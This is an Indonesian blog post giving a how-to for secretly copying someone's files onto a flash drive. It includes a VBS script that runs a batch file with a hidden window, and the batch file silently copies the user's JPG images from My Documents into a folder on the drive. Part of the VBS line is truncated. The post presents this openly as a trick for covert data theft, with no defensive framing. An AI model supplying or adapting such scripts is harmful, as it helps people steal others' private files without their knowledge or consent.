Trik mencuri data ke Flash disk secara diam - diam

  • 1.Buka notepad, buat file vbs ketik atau copy paste script berikut:

    dim wshshell, dos

    set wshshell = wscript.createobject("wscript.shell")

    dos = wshshell.expandenvironmentstrings("%coms...

    wshshell.run (dos & " /c tarik.bat"), vbhide

    2.Simpan dengan file name nya contoh start.vbs save as typenya pilih all
    files

    3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut:

    @echo off

    mkdir %computername%

    xcopy "C:\Documents and Settings\%username%\My Documents\*.jpg"
    %computername% /s/c/q/r

    @cls

    @exit

    4.Simpan dengan file name nya contoh tarik.bat save as typenya pilih all
    files.

    5.Nama file bat ini harus sesuai dengan script file vbs bari

    0 komentar:

    Posting Komentar